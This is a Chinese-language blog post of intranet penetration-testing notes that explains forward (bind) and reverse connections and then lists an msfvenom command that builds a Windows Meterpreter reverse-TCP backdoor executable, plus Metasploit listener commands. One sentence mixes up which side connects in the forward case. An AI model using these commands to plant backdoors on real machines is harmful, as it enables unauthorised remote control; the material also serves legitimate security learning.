内网:正向连接与反向连接

最新推荐文章于 2024-06-21 18:12:08 发布
最新推荐文章于 2024-06-21 18:12:08 发布
阅读量854 收藏 8
点赞数 4
分类专栏: 内网学习 文章标签: copilot 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kui576/article/details/136636085
版权

内网:正向连接与反向连接

正向连接和反向连接(以攻击机为参照)

正向连接(攻击机主动去连接受害主机)

正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有公网ip的情况下。例如下面,受害主机具有公网ip,被控主机kali可以通过ip地址访问到受害主机,所以能够使用正相连接来控制受害主机。

img

即:攻击机主动连接被攻击机

反向连接 (受害主机出网 主动连接攻击机)

反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。例如,受害主机是一台位于内网,并且没有公网ip且能访问互联网的主机,控制主机无法直接通过ip地址访问到受害主机。所以此时需要在控制主机上监听一个端口,让受害机主动连接控制主机,从而实现对控制主机的控制。

由于正向连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制

img

即:被攻击机主动连接攻击机

在实战中,正向连接往往受限于被控主机上的防火墙屏蔽及权限不足等情况,而反向连接可以很好地突破这些限制

总结

  • 如果被控主机出网,优先考虑使用反向连接
  • 如果被控主机有公网ip又不出网,考虑使用正向连接

MSF上线操作(生成后面与监听)

生成后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > xd.exe

MSF启动监听:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 4444

exploit

原作者:~Echo

kui954
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Linux反弹shell和正向连接
PP Jun的博客
10-02 684
Linux反弹shell和正向连接 正向连接:使用ssh命令是主机主动连接受目标机,通过这个连接本机可以主动的向目标机发送一些请求,这称为正向连接。(主机在内网,目标机器在外网) 反向连接:指目标机主动连接主机,通过这个目标机可以主动向主机发送一些请求。(主机在外网,目标机在内网) 此次实验中:CentOS为主机,Min为目标机 First of all,将两台虚拟机设置为仅主机模式 查看CentOS的IP Cent0S的IP为:192.168.79.128 将Min配置网络 Min的IP为:192
Linux——部署DNS服务二: 正向解析,反向解析,双向解析
weixin_44791884的博客
11-28 148
DNS正向解析(权威配置) 作用: 用于域名到IP地址的映射,当DNS客户端请求解析某个域名时,DNS服务器通过正向查找,并返回给DNS客户端对应的IP地址 正向解析的部署 1注释掉forwarders{114.114.114.114;}; step2 vim /etc/named.rfc1912.zones 新添加一个zone(可以复制19到23行) step3复制named.localh...
反向连接&反弹shell
AlunXZhou的博客
03-28 468
nc.exe在127.0.0.1:80端口搭建的根目录中,现将nc.exe传入127.0.01:8080搭建的根目录中。采用正反向连接,尝试用kali连接windows,并且反弹shell。//绑定CMD到本地5566端口。//绑定CMD到目标5566端口。//绑定SH到本地5566端口。//绑定sh到目标5566端口。Linux控制Windows。Windows控制Linux。Windows控制Linux。//主动连接目标5566。//主动连接目标5566。//等待5566连接。//等待5566连接
内网安全:代理技术详解
最新发布
baimao__Ch的博客
06-21 754
背景:拿下内网的一个主机权限并且上线到MSF/CS上,IP:192.168.x.*使用控制192.168.x.*的Meterpreter启动路由,MSF相当于进入到该网段中开启节点,支持代理来的转发流量攻击机A(外网,军火库)配置代理到MSF上CS代理建立:有手就行在192.168.x.*的会话上开启SOCKS代理在攻击机A上配置代理装置建立通讯的最大意义就是:可以实现攻击机与内网主机的通讯,有了通讯才能横向移动要根据防火墙因地制宜的选择方式。
SSH正向连接反向连接
icylling的专栏
04-27 6356
ssh -L sourcePort:forwardToHost:onPort connectToHost 意思:连接主机connectToHost,监听本地的端口sorcePort,通过主机connectToHost,把到本地端口sorcePort的连接转发到主机forwardToHost的端口onPort。 图中的两个例子: your host是敲命令的主机。 ssh -L 123:local...
反弹shell的正向连接反向连接
qq_44833342的博客
05-29 421
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
python小马,正向连接反向连接
y0un9er
05-10 877
读书笔记:Python黑帽子 黑客与渗透测试编程之道 首先向大家推荐一下我所看的这本书 颜值还不错吧,200页不到,但是干货满满。 像我,基本没有 python 基础(只在 w3school 看过一点点语法,能看懂一点点别人的代码,自己完全不会写的那种),但是我现在能写下这篇文章已经很不错了,而且我也就才翻了20来页 当然咯,代码bug很多,但是木马还勉强能用(大神们请留步,麻烦指点一二 /抱拳) 最后还有一句,python 木马局限性大,毕竟一般人不会在自己电脑上装个 python 环境吧,按原书作者的
ssh正向连接反向连接 用大白话解释
weixin_45208900的博客
08-30 1407
这篇文章说的不严谨的 我一开始学这个东西很迷惑 总感觉不清晰 就查了很多东西 最后想总结成通俗易懂的笔记记录下来 也会希望和我一样的小白读了后能懂 如果dalao觉得我有地方说错了 请私信我 我会立刻改的 1、ssh 正向连接 客户端连服务端 然后客户端能看到(访问)服务端能看见的东西 2、ssh 反向连接 客户端连服务端 然后客户端把能看见(访问)的东西 给服务端看 如果有三台计算机 A B C A的ip是 192.168.0.1 B 有俩 ip 192.168.0.2和10.10.10.1 .
Nginx (一) 正向代理 & 反向代理 及配置
01-07
Nginx使用基于事件驱动架构,使得其可以支持数以百万级别的TCP连接 高度的模块化和自由软件许可证使得第三方模块层出不穷(开源) Nginx是一个跨平台服务器,可以运行在Linux,Windows,FreeBSD,Solaris,AIX,Mac ...
nginx正向代理与反向代理详解
01-09
**Nginx正向代理与反向代理详解** 在理解Nginx的正向代理和反向代理之前,首先需要了解代理的基本概念。代理服务器是一个充当客户端和服务器之间中间人的服务器,它接收客户端的请求,并转发给适当的服务器,同时将...
内网渗透体系学习5
m0_55772907的博客
10-26 2080
内网
使用Msfvenom生成Ubuntu 64位木马(反向连接正向连接
热门推荐
zhang35的博客
04-20 1万+
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
ssh正向连接反向连接、做socks代理
su_ocean16的专栏
11-27 2309
最近才发现ssh有多么的强大! 在网上搜了半天,发现大多数人都是一瓶子不满的水平,浅尝辄止。就没有几个人有点儿科学研究的精神吗?为啥不把它搞明白呢? 当然,相信有不少人是很明白的,但是不愿意写博文来公开。其实这样大可不必,独乐乐不如众乐乐,何必那么小肚鸡肠? 1、用ssh做正向连接 啥叫正向连接?就是client连上server,然后把server能访问的机器地址和端口(当然也包括
网站外链和反向链接的区别(怎么区分外链与反向链接)
a2386436900的博客
07-28 766
我们经常通过新云查分析网站查外链时看到查出显示的是反向链接,这时也许会有人问外链与反向链接的区别是什么?这个问题在网上是比较有争议的,其实现在的优化我们也不需要分那么清楚,把反链当作外链看就行了,但是我们身为seo优化人员还是有必要了解一下外链和反向链接的区别的。 一、外链:外链即能够给你带来蜘蛛爬行访问的链接就叫做外链,也就是说从网站外部的其他网页链接到你的网站的链接。对待外链,大部分新手有一个误区就是,外部链接应该都是链接到网站首页的。这种认识是不准确的。网站的内页也可以并且应该有导入链接,这对于
知识推理——正向链接推理
weixin_45237780的博客
12-12 2262
规则推理——正向链接推理正向链接推理正向链接推理的特点正向链接推理的优点:正向链接推理的缺点:如何克服正向推理的缺点呢? 基于规则的推理机使用的推理方式主要有三种 1、正向链接推理 2、逆向链接推理 3、混合推理 正向链接推理 在知识图谱中知识主要以显示知识和隐式知识两种。显示知识是知识图谱中已有的事实陈述,而隐式知识是有知识图谱中的显示知识、实体之间的语义关系以及规则共同暗指的事实。之所以叫正向链接,原因在于推理的过程是始终从知识库中已有的规则和知识来推理出隐含的知识,如下图所示。 刚开始,事实1和事实
SSH的正向连接反向连接
蓝翔顶级电脑技工
11-14 2552
正向连接// 将中间主机可访问的主机的指定端口 镜像到本地指定端口 ssh -L 本地IP:本地端口:远程可访问IP:远程可访问IP的端口 root@中间主机案例: 公司为了安全配置了两台机器,一台可供外网访问[公司主机A]。另外一台不能外网访问[公司主机B],但可与[公司主机A]互连。现在我在遥远外地,我要取公司[主机B]的文件,但此时无人在公司。 但我有一台连接外网的[个人主机P],可以做
正向连接反向链接 && SSH 正向代理、反向代理(未完待续)
OMG二黑的博客
04-05 1863
浅析 SSH 正向代理 方向代理。
[ MSF使用实例 ] 利用永恒之黑采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost)
qq_51577576的博客
10-19 1173
[ MSF使用实例 ] 利用利用SMBv3远程代码执行漏洞(SMBGhost)(CVE-2020-0796)(永恒之黑)采用正向连接 shell 获得主机权限 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 SMBGhost
MSF利用
m0_73927535的博客
03-24 1052
漏洞检测程序,只检测漏洞是否存在:漏洞利用程序,真正发起攻击的行为,kali中集成了很多EXP,代码文件目录:/usr/share/metasploit-framework/modules/exploits:攻击主机主动去连接被攻击主机,比如我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,防火墙对进入主机某些端口的数据限制是很严的,一般防火墙都是进口的数据限制严格,出口的数据限制相对没有那么严格。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kui954

感谢各位的支持o(* ̄3 ̄)o

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值